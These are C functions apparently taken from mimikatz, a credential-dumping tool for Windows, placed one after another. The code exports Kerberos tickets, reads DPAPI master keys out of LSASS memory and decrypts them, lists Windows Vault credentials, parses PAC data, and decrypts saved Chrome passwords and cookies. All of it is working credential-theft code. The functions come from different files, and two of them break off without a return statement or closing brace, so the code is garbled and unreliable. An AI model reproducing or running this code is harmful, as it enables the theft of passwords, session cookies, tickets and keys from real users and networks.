void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTicketToo)
{
kprintf(L"\n\t Start/End/MaxRenew: ");
kull_m_string_displayLocalFileTime(&ticket->StartTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime(&ticket->EndTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime(&ticket->RenewUntil);
kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Service Name ", ticket->ServiceName, &ticket->DomainName);
kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Target Name ", ticket->TargetName, &ticket->TargetDomainName);
kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Client Name ", ticket->ClientName, &ticket->AltTargetDomainName);
if(ticket->Description.Buffer)
kprintf(L" ( %wZ )", &ticket->Description);
kprintf(L"\n\t Flags %08x : ", ticket->TicketFlags);
kuhl_m_kerberos_ticket_displayFlags(ticket->TicketFlags);
kprintf(L"\n\t Session Key : 0x%08x - %s", ticket->KeyType, kuhl_m_kerberos_ticket_etype(ticket->KeyType));
if(ticket->Key.Value)
{
kprintf(L"\n\t ");
kull_m_string_wprintf_hex(ticket->Key.Value, ticket->Key.Length, 0);
}
kprintf(L"\n\t Ticket : 0x%08x - %s ; kvno = %u", ticket->TicketEncType, kuhl_m_kerberos_ticket_etype(ticket->TicketEncType), ticket->TicketKvno);
if(encodedTicketToo)
{
kprintf(L"\n\t ");
if(ticket->Ticket.Value)
kull_m_string_wprintf_hex(ticket->Ticket.Value, ticket->Ticket.Length, 1);
else PRINT_ERROR_AUTO(L"NULL Ticket Value !");
}
else kprintf(L"\t[...]");
}
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
{
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hLocalMemory}, aKey = {NULL, &hLocalMemory}, aLsass = {NULL, pData->cLsass->hLsassMem};
PKUHL_M_SEKURLSA_PACKAGE pPackage = (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
BYTE dgst[SHA_DIGEST_LENGTH];
DWORD monNb = 0;
if(pData->LogonType != Network)
{
kuhl_m_sekurlsa_printinfos_logonData(pData);
if(pPackage->Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &pPackage->Module, MasterKeyCacheReferences, ARRAYSIZE(MasterKeyCacheReferences), (PVOID *) &pMasterKeyCacheList, NULL, NULL, NULL))
{
aLsass.address = pMasterKeyCacheList;
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY)))
{
aLsass.address = mesCredentials.Flink;
while(aLsass.address != pMasterKeyCacheList)
{
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY)))
{
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
{
kprintf(L"\t [%08x]\n\t * GUID :\t", monNb++);
kull_m_string_displayGUID(&mesCredentials.KeyUid);
kprintf(L"\n\t * Time :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime);
if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))
{
aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);
if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))
{
(*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);
kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);
if(kull_m_crypto_hash(CALG_SHA1, aKey.address, mesCredentials.keySize, dgst, SHA_DIGEST_LENGTH))
{
kprintf(L"\n\t * sha1(key) :\t"); kull_m_string_wprintf_hex(dgst, SHA_DIGEST_LENGTH, 0);
kuhl_m_dpapi_oe_masterkey_add(&mesCredentials.KeyUid, dgst, SHA_DIGEST_LENGTH);
}
}
LocalFree(aKey.address);
}
kprintf(L"\n");
}
aLsass.address = mesCredentials.Flink;
}
else break;
}
}
} else kprintf(L"\n\tKO");
kprintf(L"\n");
}
return TRUE;
}
void kuhl_m_sekurlsa_printinfos_logonData(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
kprintf(L"\nAuthentication Id : %u ; %u (%08x:%08x)\n"
L"Session : %s from %u\n"
L"User Name : %wZ\n"
L"Domain : %wZ\n"
L"Logon Server : %wZ\n"
, pData->LogonId->HighPart, pData->LogonId->LowPart, pData->LogonId->HighPart, pData->LogonId->LowPart, KUHL_M_SEKURLSA_LOGON_TYPE[pData->LogonType], pData->Session, pData->UserName, pData->LogonDomain, pData->LogonServer);
kprintf(L"Logon Time : ");
kull_m_string_displayLocalFileTime(&pData->LogonTime);
kprintf(L"\n");
kprintf(L"SID : ");
if(pData->pSid)
kull_m_string_displaySID(pData->pSid);
kprintf(L"\n");
}
NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
{
DWORD i, j, k, l, cbVaults, cbItems;
LPGUID vaults;
HANDLE hVault;
PVOID items;
PVAULT_ITEM_7 items7, pItem7;
PVAULT_ITEM_8 items8, pItem8;
NTSTATUS status;
if(isVaultInit)
{
if(NT_SUCCESS(VaultEnumerateVaults(0, &cbVaults, &vaults)))
{
for(i = 0; i < cbVaults; i++)
{
kprintf(L"\nVault : "); kull_m_string_displayGUID(&vaults[i]); kprintf(L"\n");
if(NT_SUCCESS(VaultOpenVault(&vaults[i], 0, &hVault)))
{
kuhl_m_vault_list_descVault(hVault);
if(NT_SUCCESS(VaultEnumerateItems(hVault, 0, &cbItems, &items)))
{
kprintf(L"\tItems (%u)\n", cbItems);
for(j = 0; j < cbItems; j++)
{
if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8) // to fix !
{
items7 = (PVAULT_ITEM_7) items;
kprintf(L"\t %2u.\t%s\n", j, items7[j].FriendlyName);
kprintf(L"\t\tType : "); kull_m_string_displayGUID(&items7[j].SchemaId); kprintf(L"\n");
kprintf(L"\t\tLastWritten : "); kull_m_string_displayLocalFileTime(&items7[j].LastWritten); kprintf(L"\n");
kprintf(L"\t\tFlags : %08x\n", items7[j].Flags);
kprintf(L"\t\tRessource : "); kuhl_m_vault_list_descItemData(items7[j].Ressource); kprintf(L"\n");
kprintf(L"\t\tIdentity : "); kuhl_m_vault_list_descItemData(items7[j].Identity); kprintf(L"\n");
kprintf(L"\t\tAuthenticator : "); kuhl_m_vault_list_descItemData(items7[j].Authenticator); kprintf(L"\n");
for(k = 0; k < items7[j].cbProperties; k++)
{
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items7[j].Properties + k); kprintf(L"\n");
}
pItem7 = NULL;
status = VaultGetItem7(hVault, &items7[j].SchemaId, items7[j].Ressource, items7[j].Identity, NULL, 0, &pItem7);
kprintf(L"\t\t*Authenticator* : ");
if(status == STATUS_SUCCESS)
kuhl_m_vault_list_descItemData(pItem7->Authenticator);
else
PRINT_ERROR(L"VaultGetItem7 : %08x", status);
kprintf(L"\n");
;
}
else
{
items8 = (PVAULT_ITEM_8) items;
kprintf(L"\t %2u.\t%s\n", j, items8[j].FriendlyName);
kprintf(L"\t\tType : "); kull_m_string_displayGUID(&items8[j].SchemaId); kprintf(L"\n");
kprintf(L"\t\tLastWritten : "); kull_m_string_displayLocalFileTime(&items8[j].LastWritten); kprintf(L"\n");
kprintf(L"\t\tFlags : %08x\n", items8[j].Flags);
kprintf(L"\t\tRessource : "); kuhl_m_vault_list_descItemData(items8[j].Ressource); kprintf(L"\n");
kprintf(L"\t\tIdentity : "); kuhl_m_vault_list_descItemData(items8[j].Identity); kprintf(L"\n");
kprintf(L"\t\tAuthenticator : "); kuhl_m_vault_list_descItemData(items8[j].Authenticator); kprintf(L"\n");
kprintf(L"\t\tPackageSid : "); kuhl_m_vault_list_descItemData(items8[j].PackageSid); kprintf(L"\n");
for(k = 0; k < items8[j].cbProperties; k++)
{
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items8[j].Properties + k); kprintf(L"\n");
}
pItem8 = NULL;
status = VaultGetItem8(hVault, &items8[j].SchemaId, items8[j].Ressource, items8[j].Identity, items8[j].PackageSid, NULL, 0, &pItem8);
kprintf(L"\t\t*Authenticator* : ");
if(status == STATUS_SUCCESS)
kuhl_m_vault_list_descItemData(pItem8->Authenticator);
else
PRINT_ERROR(L"VaultGetItem8 : %08x\n", status);
kprintf(L"\n");
for(l = 0; l < (sizeof(schemaHelper) / sizeof(VAULT_SCHEMA_HELPER)); l++)
{
if(RtlEqualGuid(&items8[j].SchemaId, &schemaHelper[l].guidString.guid))
{
kprintf(L"\n\t\t*** %s ***\n", schemaHelper[l].guidString.text);
if(schemaHelper[l].helper)
{
schemaHelper[l].helper(&schemaHelper[l].guidString, &items8[j], ((status == STATUS_SUCCESS) && pItem8) ? pItem8 : NULL, TRUE);
kprintf(L"\n");
}
break;
}
}
if(pItem8)
VaultFree(pItem8);
}
}
VaultFree(items);
}
VaultCloseVault(&hVault);
}
}
}
VaultFree(vaults);
}
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_list(int argc, wchar_t * argv[])
{
NTSTATUS status, packageStatus;
KERB_QUERY_TKT_CACHE_REQUEST kerbCacheRequest = {KerbQueryTicketCacheExMessage, {0, 0}};
PKERB_QUERY_TKT_CACHE_EX_RESPONSE pKerbCacheResponse;
PKERB_RETRIEVE_TKT_REQUEST pKerbRetrieveRequest;
PKERB_RETRIEVE_TKT_RESPONSE pKerbRetrieveResponse;
DWORD szData, i;
wchar_t * filename;
BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL);
status = LsaCallKerberosPackage(&kerbCacheRequest, sizeof(KERB_QUERY_TKT_CACHE_REQUEST), (PVOID *) &pKerbCacheResponse, &szData, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
{
for(i = 0; i < pKerbCacheResponse->CountOfTickets; i++)
{
kprintf(L"\n[%08x] - 0x%08x - %s", i, pKerbCacheResponse->Tickets[i].EncryptionType, kuhl_m_kerberos_ticket_etype(pKerbCacheResponse->Tickets[i].EncryptionType));
kprintf(L"\n Start/End/MaxRenew: ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].StartTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].EndTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].RenewTime);
kprintf(L"\n Server Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ServerName, &pKerbCacheResponse->Tickets[i].ServerRealm);
kprintf(L"\n Client Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ClientName, &pKerbCacheResponse->Tickets[i].ClientRealm);
kprintf(L"\n Flags %08x : ", pKerbCacheResponse->Tickets[i].TicketFlags);
kuhl_m_kerberos_ticket_displayFlags(pKerbCacheResponse->Tickets[i].TicketFlags);
if(export)
{
szData = sizeof(KERB_RETRIEVE_TKT_REQUEST) + pKerbCacheResponse->Tickets[i].ServerName.MaximumLength;
if(pKerbRetrieveRequest = (PKERB_RETRIEVE_TKT_REQUEST) LocalAlloc(LPTR, szData)) // LPTR implicates KERB_ETYPE_NULL
{
pKerbRetrieveRequest->MessageType = KerbRetrieveEncodedTicketMessage;
pKerbRetrieveRequest->CacheOptions = /*KERB_RETRIEVE_TICKET_USE_CACHE_ONLY | */KERB_RETRIEVE_TICKET_AS_KERB_CRED;
pKerbRetrieveRequest->TicketFlags = pKerbCacheResponse->Tickets[i].TicketFlags;
pKerbRetrieveRequest->TargetName = pKerbCacheResponse->Tickets[i].ServerName;
pKerbRetrieveRequest->TargetName.Buffer = (PWSTR) ((PBYTE) pKerbRetrieveRequest + sizeof(KERB_RETRIEVE_TKT_REQUEST));
RtlCopyMemory(pKerbRetrieveRequest->TargetName.Buffer, pKerbCacheResponse->Tickets[i].ServerName.Buffer, pKerbRetrieveRequest->TargetName.MaximumLength);
status = LsaCallKerberosPackage(pKerbRetrieveRequest, szData, (PVOID *) &pKerbRetrieveResponse, &szData, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
{
if(filename = kuhl_m_kerberos_generateFileName(i, &pKerbCacheResponse->Tickets[i], MIMIKATZ_KERBEROS_EXT))
{
if(kull_m_file_writeData(filename, pKerbRetrieveResponse->Ticket.EncodedTicket, pKerbRetrieveResponse->Ticket.EncodedTicketSize))
kprintf(L"\n * Saved to file : %s", filename);
LocalFree(filename);
}
LsaFreeReturnBuffer(pKerbRetrieveResponse);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbRetrieveEncodedTicketMessage / Package : %08x\n", packageStatus);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbRetrieveEncodedTicketMessage : %08x\n", status);
LocalFree(pKerbRetrieveRequest);
}
}
kprintf(L"\n");
}
LsaFreeReturnBuffer(pKerbCacheResponse);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message / Package : %08x\n", packageStatus);
}
NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[])
{
PPACTYPE pacType;
DWORD pacLenght, i, j;
BYTE buffer[16] = {0};
PRPCE_KERB_VALIDATION_INFO pValInfo;
PPAC_SIGNATURE_DATA pSignatureData;
PPAC_CLIENT_INFO pClientInfo;
PGROUP_MEMBERSHIP pGroup;
PRPCE_KERB_EXTRA_SID pExtraSids;
PSID pSid;
PVOID base;
if(kull_m_file_readData(L"C:\\security\\mimikatz\\mimikatz\\bad.pac", (PBYTE *) &pacType, &pacLenght))
{
kprintf(L"version %u, nbBuffer = %u\n\n", pacType->Version, pacType->cBuffers);
for(i = 0; i < pacType->cBuffers; i++)
{
switch(pacType->Buffers[i].ulType)
{
case PACINFO_TYPE_LOGON_INFO:
pValInfo = (PRPCE_KERB_VALIDATION_INFO) ((PBYTE) pacType + pacType->Buffers[i].Offset);
base = (PBYTE) &pValInfo->infos + sizeof(MARSHALL_KERB_VALIDATION_INFO);
kprintf(L"[%02u] %08x @ offset %016llx (%u)\n", i, pacType->Buffers[i].ulType, pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize);
kull_m_string_wprintf_hex((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, 1 | (16 << 16));
kprintf(L"\n");
kprintf(L"*** Validation Informations *** (%u)\n", pacType->Buffers[i].cbBufferSize);
kprintf(L"TypeHeader : version 0x%02x, endianness 0x%02x, length %hu (%u), filer %08x\n", pValInfo->typeHeader.Version, pValInfo->typeHeader.Endianness, pValInfo->typeHeader.CommonHeaderLength, sizeof(MARSHALL_KERB_VALIDATION_INFO), pValInfo->typeHeader.Filler);
kprintf(L"PrivateHeader : length %u, filer %08x\n", pValInfo->privateHeader.ObjectBufferLength, pValInfo->privateHeader.Filler);
kprintf(L"RootElementId : %08x\n\n", pValInfo->RootElementId);
kprintf(L"LogonTime %016llx - ", pValInfo->infos.LogonTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogonTime); kprintf(L"\n");
kprintf(L"LogoffTime %016llx - ", pValInfo->infos.LogoffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogoffTime); kprintf(L"\n");
kprintf(L"KickOffTime %016llx - ", pValInfo->infos.KickOffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.KickOffTime); kprintf(L"\n");
kprintf(L"PasswordLastSet %016llx - ", pValInfo->infos.PasswordLastSet); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordLastSet); kprintf(L"\n");
kprintf(L"PasswordCanChange %016llx - ", pValInfo->infos.PasswordCanChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordCanChange); kprintf(L"\n");
kprintf(L"PasswordMustChange %016llx - ", pValInfo->infos.PasswordMustChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordMustChange); kprintf(L"\n");
kprintf(L"\n");
kuhl_m_kerberos_pac_ustring(L"EffectiveName ", &pValInfo->infos.EffectiveName, base);
kuhl_m_kerberos_pac_ustring(L"FullName ", &pValInfo->infos.FullName, base);
kuhl_m_kerberos_pac_ustring(L"LogonScript ", &pValInfo->infos.LogonScript, base);
kuhl_m_kerberos_pac_ustring(L"ProfilePath ", &pValInfo->infos.ProfilePath, base);
kuhl_m_kerberos_pac_ustring(L"HomeDirectory ", &pValInfo->infos.HomeDirectory, base);
kuhl_m_kerberos_pac_ustring(L"HomeDirectoryDrive ", &pValInfo->infos.HomeDirectoryDrive, base);
kprintf(L"\n");
kprintf(L"LogonCount %hu\n", pValInfo->infos.LogonCount);
kprintf(L"BadPasswordCount %hu\n", pValInfo->infos.BadPasswordCount);
kprintf(L"\n");
kprintf(L"UserId %08x (%u)\n", pValInfo->infos.UserId, pValInfo->infos.UserId);
kprintf(L"PrimaryGroupId %08x (%u)\n", pValInfo->infos.PrimaryGroupId, pValInfo->infos.PrimaryGroupId);
kprintf(L"\n");
kprintf(L"GroupCount %u\n", pValInfo->infos.GroupCount);
pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.GroupIds, base);
kprintf(L"GroupIds @ %08x\n * RID : ", pValInfo->infos.GroupIds);
for(j = 0; j < pValInfo->infos.GroupCount; j++)
kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes);
kprintf(L"\n\n");
kprintf(L"UserFlags %08x (%u)\n", pValInfo->infos.UserFlags, pValInfo->infos.UserFlags);
kprintf(L"UserSessionKey "); kull_m_string_wprintf_hex(pValInfo->infos.UserSessionKey.data, 16, 0); kprintf(L"\n");
kprintf(L"\n");
kuhl_m_kerberos_pac_ustring(L"LogonServer ", &pValInfo->infos.LogonServer, base);
kuhl_m_kerberos_pac_ustring(L"LogonDomainName ", &pValInfo->infos.LogonDomainName, base);
kprintf(L"\n");
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.LogonDomainId, base);
kprintf(L"LogonDomainId @ %08x\n * SID : ", pValInfo->infos.LogonDomainId); kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L"\n");
kprintf(L"UserAccountControl %08x (%u)\n", pValInfo->infos.UserAccountControl, pValInfo->infos.UserAccountControl);
kprintf(L"SubAuthStatus %08x (%u)\n", pValInfo->infos.SubAuthStatus, pValInfo->infos.SubAuthStatus);
kprintf(L"\n");
kprintf(L"LastSuccessfulILogon %016llx\n", pValInfo->infos.LastSuccessfulILogon);
kprintf(L"LastFailedILogon %016llx\n", pValInfo->infos.LastFailedILogon);
kprintf(L"\n");
kprintf(L"FailedILogonCount %u\n", pValInfo->infos.FailedILogonCount);
kprintf(L"\n");
kprintf(L"SidCount %u\n", pValInfo->infos.SidCount);
kprintf(L"ExtraSids @ %08x\n", pValInfo->infos.ExtraSids);
pExtraSids = (PRPCE_KERB_EXTRA_SID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ExtraSids, base);
for(j = 0; j < pValInfo->infos.SidCount; j++)
{kull_m_string_wprintf_hex(pExtraSids, 64, 1);
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pExtraSids[j].ExtraSid, base);
kprintf(L"ExtraSid [%u] @ %08x\n * SID : ", j, pExtraSids[j].ExtraSid); kull_m_string_displaySID(pSid); kprintf(L"\n");
}
kprintf(L"\n");
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupDomainSid, base);
kprintf(L"ResourceGroupDomainSid @ %08x\n * SID : ", pValInfo->infos.ResourceGroupDomainSid); if(pSid) kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L"ResourceGroupCount %u\n", pValInfo->infos.ResourceGroupCount);
pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupIds, base);
kprintf(L"ResourceGroupIds @ %08x\n * RID : ", pValInfo->infos.ResourceGroupIds);
for(j = 0; j < pValInfo->infos.ResourceGroupCount; j++)
kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes);
break;
case PACINFO_TYPE_CHECKSUM_SRV: // Server Signature
case PACINFO_TYPE_CHECKSUM_KDC: // KDC Signature
pSignatureData = (PPAC_SIGNATURE_DATA) ((PBYTE) pacType + pacType->Buffers[i].Offset);
kprintf(L"*** %s Signature ***\n", (pacType->Buffers[i].ulType == 0x00000006) ? L"Server" : L"KDC");
kprintf(L"Type %08x - (%hu) : ", pSignatureData->SignatureType, 0);//pSignatureData->RODCIdentifier);
kull_m_string_wprintf_hex(pSignatureData->Signature, (pSignatureData->SignatureType == KERB_CHECKSUM_HMAC_MD5) ? LM_NTLM_HASH_LENGTH : 12, 0);
kprintf(L"\n");
break;
case PACINFO_TYPE_CNAME_TINFO: // Client name and ticket information
pClientInfo = (PPAC_CLIENT_INFO) ((PBYTE) pacType + pacType->Buffers[i].Offset);
kprintf(L"*** Client name and ticket information ***\n");
kprintf(L"ClientId %016llx - ", pClientInfo->ClientId); kull_m_string_displayLocalFileTime(&pClientInfo->ClientId); kprintf(L"\n");
kprintf(L"Client (%hu, %.*s)\n", pClientInfo->NameLength, pClientInfo->NameLength / sizeof(WCHAR), pClientInfo->Name);
break;
default:
kull_m_string_wprintf_hex(&pacType->Buffers[i], sizeof(PAC_INFO_BUFFER), 1);
kprintf(L"\n");
kprintf(L"[%02u] %08x @ offset %016llx (%u)\n", i, pacType->Buffers[i].ulType, pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize);
kull_m_string_wprintf_hex((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, 1);
kprintf(L"\n");
}
kprintf(L"\n");
}
LocalFree(pacType);
}
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[])
{
PCWSTR infile;
PSTR aInfile;
int rc;
sqlite3 *pDb;
sqlite3_stmt * pStmt;
LPVOID pDataOut;
DWORD dwDataOutLen;
__int64 i64;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(aInfile = kull_m_string_unicode_to_ansi(infile))
{
rc = sqlite3_initialize();
if(rc == SQLITE_OK)
{
rc = sqlite3_open_v2(aInfile, &pDb, SQLITE_OPEN_READONLY, NULL);
if(rc == SQLITE_OK)
{
if(kuhl_m_dpapi_chrome_isTableExist(pDb, "logins"))
{
rc = sqlite3_prepare_v2(pDb, "select signon_realm, origin_url, username_value, password_value from logins", -1, &pStmt, NULL);
if(rc == SQLITE_OK)
{
while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW)
{
kprintf(L"\nURL : %.*S ( %.*S )\nUsername: %.*S\n",
sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0),
sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1),
sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2));
if(kuhl_m_dpapi_unprotect_raw_or_blob(sqlite3_column_blob(pStmt, 3), sqlite3_column_bytes(pStmt, 3), NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
{
kprintf(L"Password: %.*S\n", dwDataOutLen, pDataOut);
LocalFree(pDataOut);
}
}
if(rc != SQLITE_DONE)
PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
}
else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
sqlite3_finalize(pStmt);
}
else if(kuhl_m_dpapi_chrome_isTableExist(pDb, "cookies"))
{
rc = sqlite3_prepare_v2(pDb, "select host_key, path, name, creation_utc, expires_utc, encrypted_value from cookies order by host_key, path, name", -1, &pStmt, NULL);
if(rc == SQLITE_OK)
{
while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW)
{
kprintf(L"\nHost : %.*S ( %.*S )\nName : %.*S\nDates : ",
sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0),
sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1),
sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2));
i64 = sqlite3_column_int64(pStmt, 3) * 10;
kull_m_string_displayLocalFileTime((LPFILETIME) &i64);
i64 = sqlite3_column_int64(pStmt, 4) * 10;
if(i64)
{
kprintf(L" -> ");
kull_m_string_displayLocalFileTime((LPFILETIME) &i64);
}
kprintf(L"\n");
if(kuhl_m_dpapi_unprotect_raw_or_blob(sqlite3_column_blob(pStmt, 5), sqlite3_column_bytes(pStmt, 5), NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
{
kprintf(L"Cookie: %.*S\n", dwDataOutLen, pDataOut);
LocalFree(pDataOut);
}
}
if(rc != SQLITE_DONE)
PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
}
else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
sqlite3_finalize(pStmt);
}
else PRINT_ERROR(L"Neither the table \'logins\' or the table \'cookies\' exist!\n");
}
else PRINT_ERROR(L"sqlite3_open_v2: %S (%S)\n", sqlite3_errmsg(pDb), aInfile);
rc = sqlite3_close_v2(pDb);
rc = sqlite3_shutdown();
}
else PRINT_ERROR(L"sqlite3_initialize: 0x%08x\n", rc);
LocalFree(aInfile);
}
}
else PRINT_ERROR(L"Input \'Login Data\' file needed (/in:\"%%localappdata%%\\Google\\Chrome\\User Data\\Default\\Login Data\")\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_list_tickets(PKERB_CALLBACK_CTX callbackCtx, BOOL bExport)
{
NTSTATUS status, packageStatus;
KERB_QUERY_TKT_CACHE_REQUEST kerbCacheRequest = {KerbQueryTicketCacheExMessage, {0, 0}};
PKERB_QUERY_TKT_CACHE_EX_RESPONSE pKerbCacheResponse;
PKERB_RETRIEVE_TKT_REQUEST pKerbRetrieveRequest = NULL;
PKERB_RETRIEVE_TKT_RESPONSE pKerbRetrieveResponse = NULL;
DWORD szData, i;
status = LsaCallKerberosPackage(&kerbCacheRequest, sizeof(KERB_QUERY_TKT_CACHE_REQUEST), (PVOID *) &pKerbCacheResponse, &szData, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
{
for(i = 0; i < pKerbCacheResponse->CountOfTickets; i++)
{
kprintf(L"\n[%08x] - 0x%08x - %s", i, pKerbCacheResponse->Tickets[i].EncryptionType, kuhl_m_kerberos_ticket_etype(pKerbCacheResponse->Tickets[i].EncryptionType));
kprintf(L"\n Start/End/MaxRenew: ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].StartTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].EndTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].RenewTime);
kprintf(L"\n Server Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ServerName, &pKerbCacheResponse->Tickets[i].ServerRealm);
kprintf(L"\n Client Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ClientName, &pKerbCacheResponse->Tickets[i].ClientRealm);
kprintf(L"\n Flags %08x : ", pKerbCacheResponse->Tickets[i].TicketFlags);
kuhl_m_kerberos_ticket_displayFlags(pKerbCacheResponse->Tickets[i].TicketFlags);
if (bExport)
{
szData = sizeof(KERB_RETRIEVE_TKT_REQUEST)+pKerbCacheResponse->Tickets[i].ServerName.MaximumLength;
if (pKerbRetrieveRequest = (PKERB_RETRIEVE_TKT_REQUEST)LocalAlloc(LPTR, szData)) // LPTR implicates KERB_ETYPE_NULL
{
pKerbRetrieveRequest->MessageType = KerbRetrieveEncodedTicketMessage;
pKerbRetrieveRequest->CacheOptions = /*KERB_RETRIEVE_TICKET_USE_CACHE_ONLY | */KERB_RETRIEVE_TICKET_AS_KERB_CRED;
pKerbRetrieveRequest->TicketFlags = pKerbCacheResponse->Tickets[i].TicketFlags;
pKerbRetrieveRequest->TargetName = pKerbCacheResponse->Tickets[i].ServerName;
pKerbRetrieveRequest->TargetName.Buffer = (PWSTR)((PBYTE)pKerbRetrieveRequest + sizeof(KERB_RETRIEVE_TKT_REQUEST));
RtlCopyMemory(pKerbRetrieveRequest->TargetName.Buffer, pKerbCacheResponse->Tickets[i].ServerName.Buffer, pKerbRetrieveRequest->TargetName.MaximumLength);
status = LsaCallKerberosPackage(pKerbRetrieveRequest, szData, (PVOID *)&pKerbRetrieveResponse, &szData, &packageStatus);
}
}
if (callbackCtx && callbackCtx->pTicketHandler)
callbackCtx->pTicketHandler(callbackCtx->lpContext, &pKerbCacheResponse->Tickets[i], pKerbRetrieveResponse ? &pKerbRetrieveResponse->Ticket : NULL);
if (pKerbRetrieveRequest)
{
LocalFree(pKerbRetrieveRequest);
pKerbRetrieveRequest = NULL;
}
if (pKerbRetrieveResponse)
{
LsaFreeReturnBuffer(pKerbRetrieveResponse);
pKerbRetrieveResponse = NULL;
}
kprintf(L"\n");
}
LsaFreeReturnBuffer(pKerbCacheResponse);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message / Package : %08x\n", packageStatus);
}
